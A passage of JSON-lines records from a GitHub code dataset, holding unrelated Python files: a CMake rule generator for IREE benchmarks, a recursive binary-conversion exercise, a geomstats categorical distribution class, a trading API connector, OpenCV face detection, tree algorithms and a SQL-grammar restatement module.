Genres.objects.get_or_create(name=genre)\n movie.genres.add(item)\n\n plot_keywords = row['plot_keywords'].split('|')\n for keyword in plot_keywords:\n if len(keyword) > 0:\n item, created = Keywords.objects.get_or_create(name=keyword)\n movie.plot_keywords.add(item)\n\n movie.save()\n","repo_name":"FiodorLaptev/movies","sub_path":"apps/movie/management/commands/import_movies.py","file_name":"import_movies.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26660009355","text":"from dataclasses import dataclass\nfrom typing import List, Optional, Sequence\nimport os\nimport pathlib\nimport urllib.parse\n\nfrom e2e_test_framework.definitions import common_definitions, iree_definitions\nimport cmake_builder.rules\n\n# Archive extensions used to pack models.\nARCHIVE_FILE_EXTENSIONS = [\".tar\", \".gz\"]\n# CMake variable name to store IREE package name.\nPACKAGE_NAME_CMAKE_VARIABLE = \"_PACKAGE_NAME\"\n\n\n@dataclass\nclass ModelRule(object):\n target_name: str\n file_path: str\n cmake_rule: str\n\n\n@dataclass\nclass IreeModelImportRule(object):\n target_name: str\n model_id: str\n model_name: str\n output_file_path: str\n mlir_dialect_type: str\n cmake_rule: Optional[str]\n\n\n@dataclass\nclass IreeModuleCompileRule(object):\n target_name: str\n output_module_path: str\n cmake_rule: str\n\n\ndef _build_target_path(target_name: str):\n \"\"\"Returns the full target path by combining the variable of package name and\n the target name.\n \"\"\"\n return f\"${{{PACKAGE_NAME_CMAKE_VARIABLE}}}_{target_name}\"\n\n\nclass CommonRuleFactory(object):\n \"\"\"Generates common cmake rules.\"\"\"\n\n def __init__(self, model_artifacts_dir: str):\n \"\"\"Constructs a CommonRuleFactory.\n\n Args:\n model_artifacts_dir: root directory to store model files. Can contain\n CMake variable syntax in the path.\n \"\"\"\n self._model_artifacts_dir = model_artifacts_dir\n self._model_rules = {}\n\n def add_model_rule(self, model: common_definitions.Model) -> ModelRule:\n \"\"\"Adds a rule to fetch a model. 
Reuses the existing rule when possible.\"\"\"\n if model.id in self._model_rules:\n return self._model_rules[model.id]\n\n # Model target: <package_name>-model-<model_id>\n target_name = f\"model-{model.id}\"\n\n model_url = urllib.parse.urlparse(model.source_url)\n\n # Drop the archive extensions.\n file_exts = pathlib.PurePath(model_url.path).suffixes\n while len(file_exts) > 0 and file_exts[-1] in ARCHIVE_FILE_EXTENSIONS:\n file_exts.pop()\n model_ext = \"\".join(file_exts)\n\n # Model path: <model_artifacts_dir>/<model_id>_<model_name><model_ext>\n model_path = f\"{self._model_artifacts_dir}/{model.id}_{model.name}{model_ext}\"\n\n if model_url.scheme == \"https\":\n cmake_rule = (f'# Fetch the model from \"{model.source_url}\"\\n' +\n cmake_builder.rules.build_iree_fetch_artifact(\n target_name=target_name,\n source_url=model.source_url,\n output=model_path,\n unpack=True))\n else:\n raise ValueError(f\"Unsupported model url: {model.source_url}.\")\n\n model_rule = ModelRule(target_name=target_name,\n file_path=model_path,\n cmake_rule=cmake_rule)\n\n self._model_rules[model.id] = model_rule\n return model_rule\n\n def generate_cmake_rules(self) -> List[str]:\n \"\"\"Dump all cmake rules in a correct order.\"\"\"\n return [rule.cmake_rule for rule in self._model_rules.values()]\n\n\nclass IreeRuleFactory(object):\n \"\"\"Generates IREE benchmark cmake rules.\"\"\"\n\n def __init__(self, iree_artifacts_dir):\n \"\"\"Constructs an IreeRuleFactory.\n\n Args:\n iree_artifacts_dir: root directory to store generated IREE artifacts. Can\n contain CMake variable syntax in the path.\n \"\"\"\n self._iree_artifacts_dir = iree_artifacts_dir\n self._import_model_rules = {}\n self._compile_module_rules = {}\n\n def add_import_model_rule(\n self,\n model_id: str,\n model_name: str,\n model_source_type: common_definitions.ModelSourceType,\n model_entry_function: str,\n source_model_rule: ModelRule,\n ) -> IreeModelImportRule:\n \"\"\"Adds a rule to fetch the model and import into MLIR. 
Reuses the rule when\n possible.\"\"\"\n\n if model_id in self._import_model_rules:\n return self._import_model_rules[model_id]\n\n # If the source model is MLIR, no import rule is needed.\n if model_source_type == common_definitions.ModelSourceType.EXPORTED_LINALG_MLIR:\n import_model_rule = IreeModelImportRule(\n target_name=source_model_rule.target_name,\n model_id=model_id,\n model_name=model_name,\n output_file_path=source_model_rule.file_path,\n mlir_dialect_type=\"linalg\",\n cmake_rule=None)\n self._import_model_rules[model_id] = import_model_rule\n return import_model_rule\n\n # Import target: <package_name>_iree-import-model-<model_id>\n target_name = f\"iree-import-model-{model_id}\"\n\n # Imported MLIR path: <iree_artifacts_dir>/<model_id>_<model_name>/<model_name>.mlir\n output_file_path = f\"{self._iree_artifacts_dir}/{model_id}_{model_name}/{model_name}.mlir\"\n\n if model_source_type == common_definitions.ModelSourceType.EXPORTED_TFLITE:\n cmake_rule = (\n f'# Import the TFLite model \"{source_model_rule.file_path}\"\\n' +\n cmake_builder.rules.build_iree_import_tflite_model(\n target_path=_build_target_path(target_name),\n source=source_model_rule.file_path,\n output_mlir_file=output_file_path))\n mlir_dialect_type = \"tosa\"\n elif model_source_type == common_definitions.ModelSourceType.EXPORTED_TF:\n cmake_rule = (\n f'# Import the Tensorflow model \"{source_model_rule.file_path}\"\\n' +\n cmake_builder.rules.build_iree_import_tf_model(\n target_path=_build_target_path(target_name),\n source=source_model_rule.file_path,\n entry_function=model_entry_function,\n output_mlir_file=output_file_path))\n mlir_dialect_type = \"mhlo\"\n else:\n raise ValueError(\n f\"Unsupported source type '{model_source_type}' of the model '{model_id}'.\"\n )\n\n # Make the import target a dependency of iree-benchmark-import-models.\n cmake_rule += cmake_builder.rules.build_add_dependencies(\n target=\"iree-benchmark-import-models\",\n deps=[_build_target_path(target_name)])\n\n import_model_rule = IreeModelImportRule(target_name=target_name,\n model_id=model_id,\n model_name=model_name,\n output_file_path=output_file_path,\n mlir_dialect_type=mlir_dialect_type,\n cmake_rule=cmake_rule)\n\n self._import_model_rules[model_id] = import_model_rule\n return import_model_rule\n\n def add_compile_module_rule(self,\n compile_config: iree_definitions.CompileConfig,\n model_import_rule: IreeModelImportRule):\n \"\"\"Adds a rule to compile an MLIR file into an IREE module. 
Reuses the existing\n rule when possible.\"\"\"\n\n model_id = model_import_rule.model_id\n model_name = model_import_rule.model_name\n\n target_id = f\"{model_id}-{compile_config.id}\"\n if target_id in self._compile_module_rules:\n return self._compile_module_rules[target_id]\n\n # Module target: <package_name>_iree-module-<model_id>-<compile_config_id>\n target_name = f\"iree-module-{target_id}\"\n\n # Module path: <iree_artifacts_dir>/<model_id>_<model_name>/<compile_config_id>.vmfb\n output_path = os.path.join(self._iree_artifacts_dir,\n f\"{model_id}_{model_name}\",\n f\"{compile_config.id}.vmfb\")\n\n compile_flags = self._generate_iree_compile_flags(\n compile_config=compile_config,\n mlir_dialect_type=model_import_rule.mlir_dialect_type\n ) + compile_config.extra_flags\n\n cmake_rule = (f'# Compile the module \"{output_path}\"\\n' +\n cmake_builder.rules.build_iree_bytecode_module(\n target_name=target_name,\n src=model_import_rule.output_file_path,\n module_name=output_path,\n flags=compile_flags))\n cmake_rule += cmake_builder.rules.build_add_dependencies(\n target=\"iree-benchmark-suites\", deps=[_build_target_path(target_name)])\n compile_module_rule = IreeModuleCompileRule(target_name=target_name,\n output_module_path=output_path,\n cmake_rule=cmake_rule)\n\n # TODO(#10155): Dump the compile flags from iree_bytecode_module into a flagfile.\n\n self._compile_module_rules[target_id] = compile_module_rule\n return compile_module_rule\n\n def generate_cmake_rules(self) -> List[str]:\n \"\"\"Dump all cmake rules in a correct order.\"\"\"\n import_model_rules = [\n rule.cmake_rule for rule in self._import_model_rules.values()\n ]\n compile_module_rules = [\n rule.cmake_rule for rule in self._compile_module_rules.values()\n ]\n return import_model_rules + compile_module_rules\n\n def _generate_iree_compile_flags(\n self, compile_config: iree_definitions.CompileConfig,\n mlir_dialect_type: str) -> List[str]:\n if len(compile_config.compile_targets) != 1:\n raise ValueError(f\"Only one compile target is supported. 
Got:\"\n f\" {compile_config.compile_targets}\")\n\n compile_target = compile_config.compile_targets[0]\n flags = [\n f\"--iree-hal-target-backends={compile_target.target_backend.value}\",\n f\"--iree-input-type={mlir_dialect_type}\"\n ]\n flags.extend(self._generate_iree_compile_target_flags(compile_target))\n return flags\n\n def _generate_iree_compile_target_flags(\n self, target: iree_definitions.CompileTarget) -> List[str]:\n arch_info: common_definitions.ArchitectureInfo = target.target_architecture.value\n if arch_info.architecture == \"x86_64\":\n flags = [\n f\"--iree-llvm-target-triple=x86_64-unknown-{target.target_abi.value}\",\n f\"--iree-llvm-target-cpu={arch_info.microarchitecture.lower()}\"\n ]\n else:\n raise ValueError(f\"Unsupported architecture '{arch_info.architecture}'\")\n return flags\n\n\ndef _generate_iree_rules(\n common_rule_factory: CommonRuleFactory, iree_artifacts_dir: str,\n module_generation_configs: Sequence[iree_definitions.ModuleGenerationConfig]\n) -> List[str]:\n iree_rule_factory = IreeRuleFactory(iree_artifacts_dir)\n for module_generation_config in module_generation_configs:\n model = module_generation_config.model\n compile_config = module_generation_config.compile_config\n\n source_model_rule = common_rule_factory.add_model_rule(model)\n import_rule = iree_rule_factory.add_import_model_rule(\n model_id=model.id,\n model_name=model.name,\n model_source_type=model.source_type,\n model_entry_function=model.entry_function,\n source_model_rule=source_model_rule)\n iree_rule_factory.add_compile_module_rule(compile_config=compile_config,\n model_import_rule=import_rule)\n\n return iree_rule_factory.generate_cmake_rules()\n\n\ndef generate_rules(\n model_artifacts_dir: str, iree_artifacts_dir: str,\n iree_module_generation_configs: Sequence[\n iree_definitions.ModuleGenerationConfig]\n) -> List[str]:\n \"\"\"Generates cmake rules to build benchmarks.\n \n Args:\n model_artifacts_dir: root directory to store model files. Can contain CMake\n variable syntax in the path.\n iree_artifacts_dir: root directory to store generated IREE artifacts. Can\n contain CMake variable syntax in the path.\n iree_module_generation_configs: compile configs for IREE targets.\n Returns:\n List of CMake rules.\n \"\"\"\n common_rule_factory = CommonRuleFactory(model_artifacts_dir)\n iree_rules = _generate_iree_rules(common_rule_factory, iree_artifacts_dir,\n iree_module_generation_configs)\n # Currently the rules are simple so the common rules can be always put at the\n # top. Need a topological sort once the dependency gets complicated.\n return common_rule_factory.generate_cmake_rules() + iree_rules\n","repo_name":"smallccn/iree","sub_path":"build_tools/python/e2e_test_framework/cmake_rule_generator.py","file_name":"cmake_rule_generator.py","file_ext":"py","file_size_in_byte":11821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18385916282","text":"# May Trinh\n# CMPS 4143 - Contemporary Programming Language\n# This program will open a file with decimal number, -1 is the sentinel value that will end the program\n# It will call a recursive function to convert the decimal number to binary number. 
\n\n#recursive function that returns the binary of a decimal number as a string\ndef recursive_base_2(num):\n # Binary number of 0 and 1 is itself\n if num < 2 :\n binary = num\n else: \n binary = str(recursive_base_2(num//2)) + str(num%2) #call function recursively with integer division\n return binary\n\n\ndef main():\n print(\"\"\"May Trinh\nCMPS 4143 - Contemporary Programming Language\nThis program will open a file with decimal number, -1 is the sentinel value that will end the program\nIt will call a recursive function to convert the decimal number to binary number.\"\"\")\n \n fileName = input(\"Enter a file name: \")\n with open(fileName) as file: #with open does not require .close(). It will close automatically\n data = file.read()\n nums = list(map(int,(data.split()))) # read numbers in as a list\n\n item = 0\n x = nums[item]\n\n #read number from the file until -1 is found\n while x is not -1:\n binary = recursive_base_2(x)\n print(\"{0} = {1}\".format(x,binary))\n item += 1\n x = nums[item]\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","repo_name":"maysie0110/CMPS-4143-Contemporary-Programming-Language","sub_path":"Assignments/program2.py","file_name":"program2.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23885882296","text":"\"\"\"Statistical Manifold of categorical distributions with the Fisher metric.\n\nLead author: Alice Le Brigant.\n\"\"\"\nfrom scipy.stats import multinomial\n\nimport geomstats.backend as gs\nfrom geomstats.information_geometry.multinomial import (\n MultinomialDistributions,\n MultinomialMetric,\n)\n\n\nclass CategoricalDistributions(MultinomialDistributions):\n r\"\"\"Class for the manifold of categorical distributions.\n\n This is the set of `n+1`-tuples of positive reals that sum up to one,\n i.e. the `n`-simplex. Each point is the parameter of a categorical\n distribution, i.e. gives the probabilities of $n$ different outcomes\n in a single experiment.\n\n Attributes\n ----------\n dim : int\n Dimension of the manifold of categorical distributions. The\n number of outcomes is dim + 1.\n embedding_manifold : Manifold\n Embedding manifold.\n \"\"\"\n\n def __init__(self, dim, **kwargs):\n kwargs.setdefault(\"metric\", CategoricalMetric(dim=dim))\n super().__init__(dim=dim, n_draws=1, **kwargs)\n\n def sample(self, point, n_samples=1):\n \"\"\"Sample from the categorical distribution.\n\n Sample from the multinomial distribution with parameters provided by\n point. This gives samples in the simplex.\n Then take the argmax to get the category associated to the sample drawn.\n\n Parameters\n ----------\n point : array-like, shape=[..., dim + 1]\n Parameters of a categorical distribution, i.e. 
probabilities\n associated to dim + 1 outcomes.\n n_samples : int\n Number of points to sample with each set of parameters in point.\n Optional, default: 1.\n\n Returns\n -------\n samples : array-like, shape=[..., n_samples]\n Samples from categorical distributions.\n \"\"\"\n point = gs.to_ndarray(point, to_ndim=2)\n samples = []\n for param in point:\n counts = multinomial.rvs(self.n_draws, param, size=n_samples)\n samples.append(gs.argmax(counts, axis=-1))\n return samples[0] if len(point) == 1 else gs.stack(samples)\n\n\nclass CategoricalMetric(MultinomialMetric):\n \"\"\"Class for the Fisher information metric on categorical distributions.\n\n The Fisher information metric on the $n$-simplex of categorical\n distributions parameters can be obtained as the pullback metric of the\n $n$-sphere using the componentwise square root.\n\n References\n ----------\n .. [K2003] R. E. Kass. The Geometry of Asymptotic Inference. Statistical\n Science, 4(3): 188 - 234, 1989.\n \"\"\"\n\n def __init__(self, dim):\n super().__init__(dim=dim, n_draws=1)\n","repo_name":"CharlesKulick/geomstats","sub_path":"geomstats/information_geometry/categorical.py","file_name":"categorical.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72534599734","text":"from conf import ANGEL_TOTP, ANGEL_API_KEY, ANGLE_CLIENT_ID, ANGEL_PIN\nfrom SmartApi import SmartConnect\nimport pyotp\n\nclass AngelOneConnector:\n def __init__(self):\n self.totp = ANGEL_TOTP\n self.apiKey = ANGEL_API_KEY\n self.clientId = ANGLE_CLIENT_ID\n self.pwd = ANGEL_PIN\n self.authToken = None\n self.refreshToken = None\n \n\n def connect(self):\n smartApi = SmartConnect(self.apiKey)\n totp = pyotp.TOTP(self.totp).now()\n data = smartApi.generateSession(self.clientId, self.pwd, totp)\n # self.authToken = data['data']['jwtToken']\n # self.refreshToken = data['data']['refreshToken']\n # print(self.authToken)\n # feedToken = smartApi.getfeedToken()\n # smartApi.ltpData()\n exchange = 'NFO' \n tradingsymbol = 'BANKNIFTY31AUG2345000PE'\n symboltoken = '60496'\n data = smartApi.ltpData(exchange, tradingsymbol, symboltoken)\n print(data)\n\n\n\n\n\n\n","repo_name":"uvaiskh/AlgoTrade","sub_path":"common/commonFunctions.py","file_name":"commonFunctions.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22328326656","text":"#https://practice.geeksforgeeks.org/problems/top-view-of-binary-tree/1\n\n#Combines Level Order Traversal + Vertical Order Traversal \n\ndef verticalOrder(root):\n queue=[root]\n hd_given_ele={root.data:0} #horizontal distance\n while queue:\n ele=queue.pop(0)\n if(ele.left):\n l=ele.left.data\n queue.append(ele.left)\n hd_given_ele[l]=hd_given_ele[ele.data]-1\n if(ele.right):\n r=ele.right.data\n queue.append(ele.right)\n hd_given_ele[r]=hd_given_ele[ele.data]+1\n \n return hd_given_ele\n \ndef printTopView(root):\n hd_ge=verticalOrder(root)\n queue=[root]\n added=set()\n while queue:\n ele=queue.pop(0)\n h=hd_ge[ele.data]\n if(h not in added):\n added.add(h)\n print(ele.data,end=\" \")\n if(ele.left):\n queue.append(ele.left)\n if(ele.right):\n queue.append(ele.right)","repo_name":"thecodearrow/Algorithms","sub_path":"Data Stuctures/Trees/TopView.py","file_name":"TopView.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} 
+{"seq_id":"7509646413","text":"import cv2\n\n#load cascade\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalcatface.xml')\n\n#capture video from webcam \ncap = cv2.VideoCapture(0)\n\nwhile True:\n #read frame\n ret, frame = cap.read()\n #convert to gray\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #detect faces\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n #draw rectangle around faces\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y), (x+w, y+h), (255,0,0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n #display frame\n cv2.imshow('frame', frame)\n #wait for key press\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\n","repo_name":"brettsullivan98/face_recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20709858385","text":"import pytest\nfrom selenium.webdriver.support import expected_conditions\nimport selenium\n\n\n@pytest.fixture(scope='module')\ndef start():\n start = selenium.webdriver.Chrome(executable_path='D:\\\\learn\\\\projects\\\\test_selenium\\\\chromedriver.exe')\n start.fullscreen_window()\n start.get('https://market.yandex.ru/')\n start.implicitly_wait(20)\n return start\n","repo_name":"Alex-testing/test_selenium","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19761493509","text":"# https://leetcode.com/problems/binary-tree-right-side-view/\n# 199. Binary Tree Right Side View\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def rightSideView(self, root: Optional[TreeNode]) -> List[int]:\n if not root:\n return []\n \n queue = [root]\n out = []\n while queue:\n out.append(queue[-1].val)\n new_queue = []\n for node in queue:\n if node.left:\n new_queue.append(node.left)\n if node.right:\n new_queue.append(node.right)\n \n queue = new_queue\n \n return out\n ","repo_name":"Priyansh121096/leetcode","sub_path":"199.py","file_name":"199.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8179601673","text":"# coding: utf-8\n\nimport random\nimport copy\nfrom typing import List\n\n\nclass Node:\n STATEMENT_TYPE = 0\n ROOT_TYPE = 1\n SELECT_TYPE = 2\n FILTER_TYPE = 3\n ORDER_TYPE = 4\n A_TYPE = 5\n\n COLUMN_TYPE = 11\n TABLE_TYPE = 12\n KEYWORD_TYPE = 13\n\n VALUE_TYPE = '3'\n\n TYPE_DICT = {'SQL': None, 'Statement': STATEMENT_TYPE, 'Root': ROOT_TYPE, 'Select': SELECT_TYPE, 'Filter': FILTER_TYPE,\n 'Order': ORDER_TYPE, 'A': A_TYPE, 'C': COLUMN_TYPE, 'T': TABLE_TYPE, 'Value': VALUE_TYPE}\n KEYWORD_LIST = [\n 'intersect', 'union', 'except', # Statement\n 'asc', 'des', 'limit', # Order\n 'and', 'or', '>', '<', '>=', '<=', '=', '!=', 'between', 'like', 'not_like', 'in', 'not_in', # Filter\n 'max', 'min', 'count', 'sum', 'avg', 'none' # A\n ]\n RULE_TEMPLATES = {\n # SQL\n 'Statement': 'Find out {0}',\n # Statement\n 'intersect Root Root': 'the common part of the set of {0} and the set of {1}',\n 'union Root Root': 'everyone in the set of {0} and the set of {1}',\n 'except Root Root': 'everyone in the set of {0} but not in the set of {1}',\n 'Root': '{0}',\n # Root\n 
'Select Filter Order': '{0}, {1}, {2}',\n 'Select Filter': '{0}, {1}',\n 'Select Order': '{0}, {1}',\n 'Select': '{0}',\n # Select\n 'A': '{0}',\n 'A A': '{0} and {1}',\n 'A A A': '{0} , {1} and {2}',\n 'A A A A': '{0} , {1} , {2} and {3}',\n 'A A A A A': '{0} , {1} , {2} , {3} and {4}',\n 'A A A A A A': '{0} , {1} , {2} , {3} , {4} and {5}',\n # A\n 'none C T': 'the {0} of {1}',\n 'max C T': 'the maximum {0} of {1}',\n 'min C T': 'the minimum {0} of {1}',\n 'count C T': 'the number of {0} of {1}',\n 'sum C T': 'the sum of {0} of {1}',\n 'avg C T': 'the average {0} of {1}',\n # Filter\n 'Filter and Filter': '{0} and {1}',\n 'Filter or Filter': '{0} or {1}',\n '= A': 'where {0} is {1}'.format('{0}', VALUE_TYPE),#['where {0} equals to {1}'.format('{0}', VALUE_TYPE), 'where {0} is {1}'.format('{0}', VALUE_TYPE)],\n '> A': 'where {0} greater than {1}'.format('{0}', VALUE_TYPE),\n '< A': 'where {0} less than {1}'.format('{0}', VALUE_TYPE),\n '>= A': 'where {0} greater than or equals to {1}'.format('{0}', VALUE_TYPE),\n '<= A': 'where {0} less than or equals to {1}'.format('{0}', VALUE_TYPE),\n '!= A': 'where {0} not equals to {1}'.format('{0}', VALUE_TYPE),\n 'between A': 'where {0} between {1} and {2}'.format('{0}', VALUE_TYPE, VALUE_TYPE),\n 'like A': 'where {0} like {1}'.format('{0}', VALUE_TYPE),\n 'not_like A': 'where {0} not like {1}'.format('{0}', VALUE_TYPE),\n '= A Root': ['where {0} equals to {1}', 'where {0} is {1}'],\n '> A Root': 'where {0} greater than {1}',\n '< A Root': 'where {0} less than {1}',\n '>= A Root': 'where {0} greater than or equals to {1}',\n '<= A Root': 'where {0} less than or equals to {1}',\n '!= A Root': 'where {0} not equals to {1}',\n 'between A Root': 'where {0} is between {1}', # todo: useless\n 'in A Root': 'where {0} is in the set of {1}',\n 'not_in A Root': 'where {0} is not in the set of {1}',\n # Order\n 'asc A': 'in ascending order of {0}',\n 'des A': 'in descending order of {0}',\n 'asc A limit': 'in ascending order of {0}' + 'with maximum {0} item(s)'.format(VALUE_TYPE),\n 'des A limit': 'in descending order of {0}' + 'with maximum {0} item(s)'.format(VALUE_TYPE),\n }\n RULE_TEMPLATES_WITHOUT_TABLE = copy.copy(RULE_TEMPLATES)\n RULE_TEMPLATES_WITHOUT_TABLE.update({\n 'none C T': 'the {0}',\n 'max C T': 'the maximum {0}',\n 'min C T': 'the minimum {0}',\n 'count C T': 'the number of {0}',\n 'sum C T': 'the sum of {0}',\n 'avg C T': 'the average {0}',\n })\n\n def __init__(self, node_id: int,\n text: str,\n statement: str,\n children_tokens: List[str],\n father=None,\n depth=0):\n self.node_id = node_id\n self.text = text\n self.statement = statement.split(' -> ')[1].strip() # align with irnet.context.grammar\n if text in Node.TYPE_DICT:\n self.type = Node.TYPE_DICT.get(text)\n elif text in Node.KEYWORD_LIST:\n self.type = Node.KEYWORD_TYPE\n else:\n raise Exception('Node type error')\n self._children_tokens = children_tokens\n self.children = []\n self.father = father\n self.depth = depth\n # father_text = 'None' if father is None else father.text\n # print(f'Created node: text={text}, children_tokens={children_tokens}, father={father_text}')\n self.checked: bool = True\n self.more_info = {} # data container for outside operations\n\n def bfs(self, process_f=lambda x: x, node_only=True):\n ret_list = []\n queue = [self]\n while queue:\n node = queue[0]\n del queue[0]\n if isinstance(node, Node):\n ret_list.append(process_f(node))\n elif isinstance(node, str) and not node_only:\n ret_list.append(process_f(node))\n if isinstance(node, Node) and 
node.children:\n queue += node.children\n return ret_list\n\n def restatement(self, with_table=True):\n # 1. Check whether a Root node exists in the subtree; if an unchecked one is left, raise an error # todo: may be eliminated\n subtree_nodes = self.bfs()\n if False in [node.checked for node in subtree_nodes if not isinstance(node, str) and node.type == Node.ROOT_TYPE]:\n raise Exception('Unchecked Root node exists, check it first')\n\n # 2. Restate each child\n return self._restate_node(self, with_table=with_table)\n\n def restatement_with_tag(self):\n # 1. Check whether a Root node exists in the subtree; if an unchecked one is left, raise an error # todo: may be eliminated\n subtree_nodes = self.bfs()\n if False in [node.checked for node in subtree_nodes if\n not isinstance(node, str) and node.type == Node.ROOT_TYPE]:\n raise Exception('Unchecked Root node exists, check it first')\n\n # 2. Restate each child\n return self._restate_node_with_tag(self)\n\n @staticmethod\n def _restate_node(node, with_table=True):\n if isinstance(node, str) and node not in Node.KEYWORD_LIST:\n raise Exception('WA!!!')\n node_statement = node.statement\n templates = Node.RULE_TEMPLATES if with_table else Node.RULE_TEMPLATES_WITHOUT_TABLE\n if node_statement in templates:\n rule_template = templates.get(node_statement)\n if isinstance(rule_template, List):\n rule_template = random.sample(rule_template, 1)[0]\n format_strings = []\n for child in node.children:\n if isinstance(child, str) and child in Node.KEYWORD_LIST:\n continue\n format_strings.append(Node._restate_node(child, with_table=with_table))\n return rule_template.format(*format_strings)\n else:\n return ' '.join(node_statement.split('_')) if node_statement != '*' else 'items' # select *\n\n @staticmethod\n def _restate_node_with_tag(node, with_table=True):\n if isinstance(node, str) and node not in Node.KEYWORD_LIST:\n raise Exception('WA!!!')\n node_statement = node.statement\n templates = Node.RULE_TEMPLATES if with_table else Node.RULE_TEMPLATES_WITHOUT_TABLE\n if node_statement in templates:\n rule_template = templates.get(node_statement)\n if isinstance(rule_template, List):\n rule_template = random.sample(rule_template, 1)[0]\n sub_strings = []\n sub_string_tags = []\n for child in node.children:\n if isinstance(child, str) and child in Node.KEYWORD_LIST:\n continue\n node_restatement_string, node_restatement_tag = Node._restate_node_with_tag(child)\n sub_strings.append(node_restatement_string)\n sub_string_tags.append(node_restatement_tag)\n restatement_string = rule_template.format(*sub_strings)\n restatement_tag = []\n nonterminal_children = [_ for _ in node.children if isinstance(_, Node)]\n for word in rule_template.split():\n if word.startswith('{') and word.endswith('}'):\n placeholder_idx = int(word[1:-1])\n if sub_string_tags[placeholder_idx] is not None:\n restatement_tag += sub_string_tags[placeholder_idx]\n else:\n restatement_tag += [nonterminal_children[placeholder_idx].text] * len(sub_strings[placeholder_idx].split()) # one tag per generated word\n else:\n restatement_tag.append(node.text)\n return restatement_string, restatement_tag\n else:\n return ' '.join(node_statement.split('_')) if node_statement != '*' else 'items', None\n # todo: tag of table and column with split char\n\n @staticmethod\n def print_subtree(node):\n def _print_subtree(node):\n print(' ' * node.depth + node.text)\n for child in node.children:\n if isinstance(child, Node):\n _print_subtree(child)\n else:\n print(' ' * (node.depth + 1) + child)\n\n _print_subtree(node)\n\n def clear_more_info_recursively(self, 
keys=None):\n if keys is None:\n def clear_more_info(node):\n node.more_info.clear()\n else:\n def clear_more_info(node):\n for key in keys:\n if key in node.more_info:\n del node.more_info[key]\n\n self.bfs(process_f=clear_more_info)\n\n def compare_node(self, node) -> bool:\n if self.type == node.type and self.children == node.children:\n return True\n else:\n return False\n\n def compare_tree(self, node) -> bool:\n if self.type != node.type or self.statement != node.statement:\n self.more_info['subtree_equal'] = node.more_info['subtree_equal'] = False\n self.bfs(lambda x: x.more_info.update({'subtree_equal': False}))\n node.bfs(lambda x: x.more_info.update({'subtree_equal': False}))\n return False\n else:\n assert len(self.children) == len(node.children)\n status = True\n for child1, child2 in zip(self.children, node.children):\n if isinstance(child1, str) or isinstance(child2, str):\n if child1 != child2:\n status = False\n elif child1.compare_tree(child2) is False:\n status = False\n self.more_info['subtree_equal'] = node.more_info['subtree_equal'] = status\n self.bfs(lambda x: x.more_info.update({'subtree_equal': status}))\n node.bfs(lambda x: x.more_info.update({'subtree_equal': status}))\n return status\n\n @staticmethod\n def from_statements(statements):\n root, _ = parse_sql_tree(statements)\n return root\n\n\ndef is_nonterminal(token):\n letter = token[0]\n if ord('A') <= ord(letter) <= ord('Z'):\n return True\n else:\n return False\n\n\ndef parse_sql_tree(tree_statements):\n # print(tree_statements)\n max_depth = -1\n depth = 0\n stack = []\n root = Node(0, 'SQL', 'SQL -> Statement', ['Statement'], depth=0)\n stack.append(root)\n for state_id, statement in enumerate(tree_statements):\n assert statement.split(' -> ')[0] == stack[-1]._children_tokens[0] # non-terminal match\n # print(f'statement = {statement}')\n nonterminal, children = statement.split('->')\n nonterminal = nonterminal.strip()\n children = [child.strip() for child in children.strip().split(' ')]\n node = Node(state_id, nonterminal, statement, children, father=stack[-1], depth=depth)\n stack[-1].children.append(node)\n del stack[-1]._children_tokens[0]\n stack.append(node)\n depth += 1\n max_depth = max(max_depth, depth)\n while stack:\n # move terminal tokens from children_tokens into children\n while stack[-1]._children_tokens and not is_nonterminal(stack[-1]._children_tokens[0]):\n stack[-1].children.append(stack[-1]._children_tokens[0])\n del stack[-1]._children_tokens[0]\n # layer up if no child waiting for process\n if len(stack[-1]._children_tokens) == 0:\n stack.pop()\n depth -= 1\n if len(stack) == 0:\n return root, max_depth\n else:\n break\n return root, max_depth\n\n\nif __name__ == '__main__':\n # sql_tree = ['Statement -> Root', 'Root -> Select Filter',\n # 'Select -> A', 'A -> count C T', 'C -> budget_in_billions', 'T -> department',\n # 'Filter -> > A', 'A -> none C T', 'C -> age', 'T -> head']\n sql_tree = ['Statement -> Root', 'Root -> Select Filter',\n 'Select -> A', 'A -> sum C T', 'C -> enr', 'T -> college',\n 'Filter -> not_in A Root', 'A -> none C T', 'C -> cname', 'T -> college',\n 'Root -> Select Filter',\n 'Select -> A', 'A -> none C T', 'C -> cname', 'T -> tryout',\n 'Filter -> = A', 'A -> none C T', 'C -> ppos', 'T -> tryout']\n root, max_depth = parse_sql_tree(sql_tree)\n Node.print_subtree(root)\n restatement = root.restatement_with_tag()\n 
